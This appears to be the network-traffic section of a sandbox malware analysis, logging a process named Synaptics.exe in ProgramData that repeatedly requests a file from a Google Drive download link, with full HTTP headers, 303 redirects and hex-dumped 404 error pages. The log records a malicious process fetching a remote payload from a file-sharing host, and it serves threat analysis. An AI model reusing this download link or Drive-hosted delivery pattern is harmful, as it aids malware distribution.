                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:29 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Hugc7uTB3nqWQEYoFRNcEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        29192.168.2.549756142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        30192.168.2.549758142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:29 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        31192.168.2.549764142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        2024-12-30 10:46:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:30 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cIv5irt1Ix__ooFgOFFQKw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        32192.168.2.549765142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:30 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC7psqz03pYJdyF-3-vzKK6TQNaVxe4RVeja77z5QcFNFOgZn9R60PB0PEIwrXjakT9y
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:30 GMT
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-k5Qi4i2LOPmJ6iX7UQ9XCw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:30 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                        2024-12-30 10:46:30 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 70 62 51 75 46 76 71 4e 33 6d 6a 6a 62 59 6a 49 47 63 31 67 59 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                        Data Ascii: t Found)!!1</title><style nonce="pbQuFvqN3mjjbYjIGc1gYw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                        2024-12-30 10:46:30 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        33192.168.2.549766142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:30 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:31 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC5rZFDVBRDrnDzLfjzUqEGWebBGL4LCaCnJId78kvhzF8qbVVQZHNVMrkNIVHiIcR50MkxczG4
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:30 GMT
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Qewve3RB0NYr2ccV7nWqxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
                                                                                                                                        2024-12-30 10:46:31 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                        2024-12-30 10:46:31 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 74 7a 53 33 70 5a 63 5f 79 68 69 6b 41 6e 41 66 64 6f 59 63 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="0tzS3pZc_yhikAnAfdoYcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                        2024-12-30 10:46:31 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        34192.168.2.549767142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:30 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=BBE26vPeC2hszqsXJ1ynrQW_9kLsZpsHYQPDP6eN2y2zdlFo-23O9GeRsAmPENzIlI7naznndqiKAzIJmuZItjQAXwfSAfPPnvZybJ9AaZfi_PUMO8gtrIeAc_xFc3PJOBW4tiY_9Etp3P_tRX_kZ_fi85pZ8xHBt0DyAqqJlwGZY_uPHd-1V5ba
                                                                                                                                        2024-12-30 10:46:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:30 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-wzXQDOTOSBLxiaaws8IOsQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        35192.168.2.549770142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:31 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=FQNrFMPCubAKFj9y0Z4k1ouEUX4Kui-QjTdr291lluRJVHeBtM1mmeusg_KkXpwdOwLJs5cOvnhmTLnOvRQR4IVppbf3RIy65RY9Q-WoT2r9-CIWSaAiRQVqHD4q_Ul2GM-1Je42Oomn7qeJ5CNwHAcFXx9lSOPP_EtpXCcGhvcSUwTGnBqeegrs
                                                                                                                                        2024-12-30 10:46:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:31 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-FJzHWm9vR-U7wHl8fmBqlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        36192.168.2.549769142.250.186.1744436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:31 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Host: docs.google.com
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Cookie: NID=520=BBE26vPeC2hszqsXJ1ynrQW_9kLsZpsHYQPDP6eN2y2zdlFo-23O9GeRsAmPENzIlI7naznndqiKAzIJmuZItjQAXwfSAfPPnvZybJ9AaZfi_PUMO8gtrIeAc_xFc3PJOBW4tiY_9Etp3P_tRX_kZ_fi85pZ8xHBt0DyAqqJlwGZY_uPHd-1V5ba
                                                                                                                                        2024-12-30 10:46:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                        Content-Type: application/binary
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:31 GMT
                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-KXlIjIpy-41N2RR7nG1KzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Server: ESF
                                                                                                                                        Content-Length: 0
                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Connection: close


                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                        37192.168.2.549771142.250.186.1294436520C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                        2024-12-30 10:46:31 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                        Cache-Control: no-cache
                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Cookie: NID=520=VNlPuwoZ5OU-bZQsx9lrCO_ozU3ysu5nqJQEAYxzknS3gd0rg70O1PiRSC_9BoYkGties1Mv4GNpnxFRuEe5f-8AVkun4ySFar50Jk345ljbdzssJ_0SeWPTxXbTManXOz5CEt4Wusfq2AYTcv5fd3EOhp7-ujBS3rjXxkhmjtlG800fmuC54Qg
                                                                                                                                        2024-12-30 10:46:31 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                        X-GUploader-UploadID: AFiumC4qyV9TWFqT9NnLWWOjZYA8acCeA_ddnAk_YucCUym_fP0EL2rTwoZRQTtnSJ8ZBicZ
                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                        Pragma: no-cache
                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                        Date: Mon, 30 Dec 2024 10:46:31 GMT
                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-peMrP7kaTL3aP7sXMcNaZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                        Content-Length: 1652
                                                                                                                                        Server: UploadServer
                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                        Connection: close
